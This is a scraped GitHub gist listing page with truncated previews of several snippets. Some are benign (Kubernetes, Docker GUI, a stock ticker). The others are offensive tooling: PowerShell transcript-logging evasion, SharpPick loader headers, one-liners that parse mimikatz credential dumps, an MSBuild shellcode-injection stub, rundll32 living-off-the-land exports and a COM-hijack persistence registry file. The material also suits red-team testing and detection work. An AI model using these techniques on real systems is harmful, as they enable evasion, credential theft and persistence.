Skip to content

Instantly share code, notes, and snippets.

View davehardy20's full-sized avatar

Dave Hardy davehardy20

101 followers · 285 following
  • UK
View GitHub Profile
@benpturner
benpturner / posh.cs
Created July 18, 2018 14:04
No Powershell with Transcript Logging Evasion
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
@bneg
bneg / EmpireDLL.cs
Created July 26, 2017 01:16
/*
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
*
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
*
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
*/
@bneg
bneg / EmpireSCT.cs
Created July 26, 2017 01:17
/*
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
*
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
*
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
*/
@lizrice
lizrice / Vagrantfile
Last active July 13, 2020 03:38
Preventative Kubernetes Security demo
# -*- mode: ruby -*-
# vi: set ft=ruby :
# After loading this
# Install a pod network
# $ kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=$(kubectl version | base64 | tr -d '\n')
# Allow pods to run on the master node
# $ kubectl taint nodes --all node-role.kubernetes.io/master-
@rizky
rizky / gui-docker.md
Last active July 26, 2020 07:18
Running Graphical applications in Docker for Mac

Setup

Docker for Mac lets you run any Linux executable in an isolated process on Mac. A graphical app is just another process, that needs access to the X11 socket of the system, or an X11 server. You can run X11 applications on a Mac using an open source project called Xquartz. The steps to expose XQuartz to a Linux process running in Docker are simple:

  1. install XQuartz from xquartz.org. Note: you need to install XQuartz version 2.7.10, version 2.7.11 does not work with Docker for Mac. Then you have 3 choices:
  2. Proxy the XQuartz socket to port 6000 or
  3. Tell Xquartz to accept network calls. This is not very secure.
  4. Tell Xquartz to accept network calls and require authentication, setup X11 security using xauth, and mount ~/.Xauthority in the container.
@quonic
quonic / Get-Ticker.ps1
Created July 2, 2017 23:28
# Converted from bash to Powershell reference: https://github.com/alexanderepstein/Bash-Snippets/blob/master/stocks/stocks
function Get-Ticker([string]$CompanyName, [string]$Ticker) {
$Query = ""
if ($CompanyName) {
$Query = $CompanyName.Replace(' ', '+')
}
elseif ($Ticker) {
$Query = $Ticker.Replace(' ', '+')
}
@Raikia
Raikia / One-liner Mimikatz Parser
Last active October 1, 2020 01:37
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"
First, before using these parsers, run: "dos2unix mimikatz_dump.txt"
Mimikatz 1.0:
cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
@vector-sec
vector-sec / msbuildQueueAPC.csproj
Created August 30, 2017 13:11
MSBuild => CSC.exe Shellcode Inject using QueueUserAPC
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<-- x86 -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<!- x64 -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@mattifestation
mattifestation / wldp_interesting_rundll32_invocations.txt
Created May 30, 2018 22:23
DLLs and export functions that wldp.dll finds interesting when invoked with rundll32
StorageUsage.dll,GetStorageUsageInfo
acmigration.dll,ApplyMigrationShims
acproxy.DLL,PerformAutochkOperations
ppioobe.dll,setupcalendaraccountforuser
edgehtml.dll,#125
edgehtml.dll,#133
davclnt.dll,davsetcookie
appxdeploymentextensions.onecore.dll,shellrefresh
pla.dll,plahost
aeinv.dll,updatesoftwareinventory
anonymous
anonymous / winlogon.reg
Created February 11, 2018 19:10
WinLogon Windows 7 x64 COM Hijack
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]